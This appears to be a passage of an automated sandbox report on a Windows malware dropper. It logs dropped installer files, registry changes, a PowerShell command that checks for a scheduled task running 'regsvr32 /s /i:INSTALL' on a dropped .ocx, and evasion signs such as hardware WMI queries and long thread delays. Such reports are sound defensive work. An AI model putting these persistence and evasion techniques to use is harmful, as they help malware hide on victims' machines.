          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | Window found: window name: TMainForm
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Skinny Orange_is1
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Static PE information: Image base 0x140000000 > 0x60000000
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: Stamp_Setup.tmp, 0000000A.00000003.2215454921.0000000002192000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000000A.00000003.2209826181.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000000C.00000003.2236329531.0000000002230000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.10.dr

          Data Obfuscation

          Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
          Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 1112, type: MEMORYSTR
          Source: _isdecmp.dll.12.dr | Static PE information: real checksum: 0x0 should be: 0x5528
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Static PE information: real checksum: 0xd40f1 should be: 0xd8e34
          Source: Stamp_Setup.tmp.9.dr | Static PE information: real checksum: 0x0 should be: 0x12974f
          Source: _setup64.tmp.10.dr | Static PE information: real checksum: 0x0 should be: 0x8546
          Source: is-H1DAG.tmp.12.dr | Static PE information: real checksum: 0x12c91c should be: 0x134190
          Source: _setup64.tmp.12.dr | Static PE information: real checksum: 0x0 should be: 0x8546
          Source: Stamp_Setup.tmp.11.dr | Static PE information: real checksum: 0x0 should be: 0x12974f
          Source: is-T07R8.tmp.12.dr | Static PE information: real checksum: 0x0 should be: 0x127a25
          Source: Stamp_Setup.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x16db80
          Source: _isdecmp.dll.10.dr | Static PE information: real checksum: 0x0 should be: 0x5528
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Static PE information: section name: .xdata
          Source: is-H1DAG.tmp.12.dr | Static PE information: section name: .xdata
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00007FFB4B0AD2A5 pushad ; iretd 15_2_00007FFB4B0AD2A6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00007FFB4B1C792B push ebx; retf 15_2_00007FFB4B1C796A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFB4B08D2A5 pushad ; iretd 17_2_00007FFB4B08D2A6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFB4B1A7215 pushad ; iretd 17_2_00007FFB4B1A7219
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFB4B1A793D push ebx; retf 17_2_00007FFB4B1A796A
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp | File created: C:\Users\user\AppData\Local\Temp\is-G7S57.tmp\_isetup\_setup64.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | File created: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_shfoldr.dll
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | File created: C:\Users\user\AppData\Local\unins000.exe (copy)
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp | File created: C:\Users\user\AppData\Local\Temp\is-G7S57.tmp\_isetup\_shfoldr.dll
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | File created: C:\Users\user\AppData\Local\is-T07R8.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | File created: C:\Users\user\AppData\Roaming\is-H1DAG.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp | File created: C:\Users\user\AppData\Local\Temp\is-G7S57.tmp\_isetup\_isdecmp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | File created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe | File created: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | File created: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_setup64.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | File created: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_isdecmp.dll
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe | File created: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | File created: C:\Users\user\AppData\Roaming\9mpr_8.ocx (copy)

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\35E0F9247368BD4D565E9EAEC5132380 be7173f6dded1b27d331d8f4ccf32807
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exe; Process information set: NOOPENFILEERRORBOX (1 entry)
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (1 entry)
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (6 entries)
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp; Process information set: NOOPENFILEERRORBOX (1 entry)
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (1 entry)
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (8 entries)
          Source: C:\Windows\System32\regsvr32.exe; Process information set: NOOPENFILEERRORBOX (67 entries)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Windows\System32\regsvr32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe System information queried: FirmwareTableInformation
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe Memory allocated: 2DD722C0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe Memory allocated: 2DD73DC0000 memory reserve | memory write watch
          Source: C:\Windows\System32\regsvr32.exe Memory allocated: 23B0000 memory reserve | memory write watch
          Source: C:\Windows\System32\regsvr32.exe Memory allocated: 1A950000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 180000
          Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 1199359
          Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 1199249
          Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 1199139
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
